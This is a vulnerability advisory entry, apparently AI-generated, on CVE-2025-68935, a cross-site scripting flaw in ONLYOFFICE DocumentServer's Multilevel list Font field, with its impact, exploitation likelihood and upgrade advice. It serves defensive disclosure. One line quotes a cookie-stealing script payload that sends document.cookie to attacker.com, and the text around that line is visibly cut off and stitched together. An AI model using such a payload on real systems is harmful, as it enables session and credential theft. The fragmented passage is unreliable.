
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68935 is a Cross-Site Scripting (XSS) vulnerability in ONLYOFFICE Docs (DocumentServer) that allows attackers to inject malicious scripts via the Font field in the Multilevel list settings window. It affects all versions of ONLYOFFICE DocumentServer before 9.2.1. The vulnerability was published on December 25, 2025, and has a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE, ONLYOFFICE Changelog).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The attack vector is network-based with low attack complexity, requiring no privileges but requiring user interaction, and has a changed scope indicating impact beyond the vulnerable component. Specifically, the Font field in the Multilevel list settings window fails to properly sanitize user-supplied input before rendering it in the browser, enabling injection of arbitrary JavaScript. The fix was documented in the ONLYOFFICE DocumentServer CHANGELOG for version 9.2.1 (ONLYOFFICE Changelog, Red Hat CVE).
Successful exploitation could allow an attacker to execute arbitrary JavaScript in the context of a victim's browser session, leading to limited confidentiality and integrity impacts such as session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. Because the scope is changed, the impact can extend beyond the ONLYOFFICE application itself to other resources accessible in the same browser context. Availability is not impacted by this vulnerability (Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-68935 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction — a victim must open or interact with a maliciously crafted document or configuration within ONLYOFFICE Docs (Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based payload)..docx, .odt, etc.) with embedded or unusual font name strings containing HTML/JavaScript syntax in Multilevel list configurations.Users should upgrade ONLYOFFICE DocumentServer to version 9.2.1 or later, which addresses this vulnerability as noted in the official changelog. No specific configuration-based workaround has been publicly documented; upgrading is the recommended and primary remediation. Organizations unable to upgrade immediately should restrict access to ONLYOFFICE instances to trusted users and avoid opening documents from untrusted sources (ONLYOFFICE Changelog, Red Hat CVE).
Coverage of CVE-2025-68935 has been limited to vulnerability database aggregators and security tracking platforms. A brief write-up was published by Infinitsec, and the vulnerability was noted on Bluesky via automated CVE tracking accounts. No significant vendor statements beyond the changelog entry or notable researcher commentary have been identified (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."